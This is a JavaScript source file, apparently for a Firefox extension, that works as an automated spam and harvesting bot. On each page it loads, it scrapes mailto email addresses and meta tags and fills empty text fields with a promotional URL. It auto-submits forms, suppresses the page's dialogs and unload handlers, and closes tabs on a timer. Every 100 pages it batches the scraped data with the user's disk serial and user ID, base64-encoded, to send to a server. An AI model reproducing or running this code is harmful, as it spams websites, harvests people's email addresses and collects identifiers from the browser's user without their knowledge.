﻿var ptZtgBan	= [
		'cpro.baidu.com',
		'googleads.g.doubleclick.net',
		'tpc.googlesyndication.com',
		'entry.baidu.com',
		'pos.baidu.com',
		'eclick.baidu.com'
	];

function domContentLoaded(aEvent)
{
	if (!aEvent.originalTarget instanceof HTMLDocument)
		return;
	
	var ctime		= timeStamp();
	var doc			= aEvent.originalTarget;
	var url			= doc.location.href;
	var rfr			= doc.referrer;
	var elements	= doc.getElementsByTagName('*').length;
	
	//------------------------------------------------------
	var emails		= '';
	var links 		= doc.getElementsByTagName('a');
	for(var i = 0; i<links.length; i++)
	{
		// 识别邮件
		if(links[i].href.indexOf('mailto:')>=0 && links[i].href.indexOf('@')>=0)
		{
			var mail	= links[i].href.substr(7);
			var wenhao	= mail.indexOf('?');	// 找到问号
			if(wenhao>0)
				mail	= mail.substr(0, wenhao);
			emails	+= mail + ',';
		}
	}
	
	//------------------------------------------------------
	// keywords 和 description
	var	keywords	= '';
	var	description	= '';
	var metas		= doc.getElementsByTagName('meta');
	for(var i = 0; i<metas.length; i++)
	{
		if(metas[i].name=='keywords')
			keywords	= metas[i].content;
		
		if(metas[i].name=='description')
			description	= metas[i].content;
	}
	
	//------------------------------------------------------
	// 自动填充表单
	// input
	var inputs	= doc.getElementsByTagName('input');
	for(var i = 0; i<inputs.length; i++)
	{
		if(inputs[i].type=='text' && inputs[i].value=='')
			inputs[i].value	= ptTGUrl;
	}
	
	// textarea
	var textareas	= doc.getElementsByTagName('textarea');
	for(var i = 0; i<textareas.length; i++)
	{
		if(textareas[i].type=='textarea' && textareas[i].innerHTML=='')
			textareas[i].innerHTML	= ptTGUrl;
	}
	
	
	//------------------------------------------------------
	// 发送回车键
	// cookie检查是否已经提交表单
	var cookieName	= doc.domain + '_msstbc';
	if(getCookie(doc, cookieName)=='')
	{
		setCookie(doc, cookieName, 'sign', 5);
		var forms	= doc.getElementsByTagName('form');
		if(forms.length>0)
			forms[0].submit();
	}
	
	// 屏蔽退出提示
	doc.prompt			= function(){return false;};
	doc.confirm 		= function(){return false;};
	doc.alert	 		= function(){};
	doc.onunload 		= function(){};
	doc.onbeforeunload	= function(){};
	
		
	// 判断域名是否已经存在
	if(!doc.domain)
		return;
	for(i=0; i<ptTGSubmit.length; i++)
	{
		//taskStatus(ptTGSubmit[i].domain + ' = ' + doc.domain);
		if(ptTGSubmit[i].domain==doc.domain)
			return;
	}
	// 域名黑名单
	if(in_array(doc.domain, ptZtgBan)==true)
		return;
	
	if(elements<3)
		return;
	
	var prm	= {
	       	   'domain':		doc.domain,
	       	   'emails':		encodeURIComponent(emails),
	       	   'elements':		elements,
	       	   'keywords':		encodeURIComponent(keywords),
	       	   'description':	encodeURIComponent(description)
				};
	var arr_len	= ptTGSubmit.push(prm);
	taskStatus('ptTGSubmit array length:' + arr_len);
	if(arr_len==100)	// 每完成多少个任务向服务器返回一次数据
	{
		commStatus('Pre send task');
		var submitObj	= {
				'ver'			: ptVer,
				'pid'			: ptPID,
				'language'		: ptLanguage,
				'diskserial'	: ptDiskSerial,
				'time'			: Date.now(),
				'userid'		: ptUserID,
				'task'			: ptTGSubmit
		};
		var json		= JSON.stringify(submitObj);
		var submitData	= window.btoa(json);
		writeMemorySubmit(submitData);
		ptTGSubmit	= [];	// 数组清空
		commStatus('Send task(' + json.length + '): '+ json);
	}
};

function main()	//打开浏览器的时候触发1次
{
	ptCustomTitle.init();	// 自定义app标题栏
	coreProcess();
	var appcontent = document.getElementById('appcontent');   // browser
	if(appcontent)
	{
		appcontent.addEventListener('DOMContentLoaded', domContentLoaded, false);
		//appcontent.addEventListener('load', domContentLoaded, false);
	}
};

function coreProcess()	// 核心管理进程
{
	var i			= 0;
	var cleanTm	= setInterval(function ()
	{
	
		var tab_loading		= 0;											// 标签页处于互交状态
		var this_time		= timeStamp();		
		var tabs_min		= 1;											// 浏览器中始终打开几个标签页（最小）
		var tabs_length		= gBrowser.mTabContainer.childNodes.length;

		for(var j=0; j<tabs_length; j++)
		{
			var tab		= gBrowser.mTabContainer.childNodes[j];
			//if(!tab)	continue;


			var linkedTime			= 0;
			if(!tab.tbcTime)
				tab.tbcTime	= this_time;

			if(tabs_length>1 && (this_time - parseInt(tab.tbcTime))>ptTimeOut)
			{
				gBrowser.removeTab( tab );
				break;
			}	
			
			
		}
		//clearTimeout(cleanTm);
	}, 1700);

};


window.addEventListener('load', main, false);	// 浏览器打开时运行
setIntPref(		'dom.max_script_run_time', 2);	// 自动关闭无响应的脚本

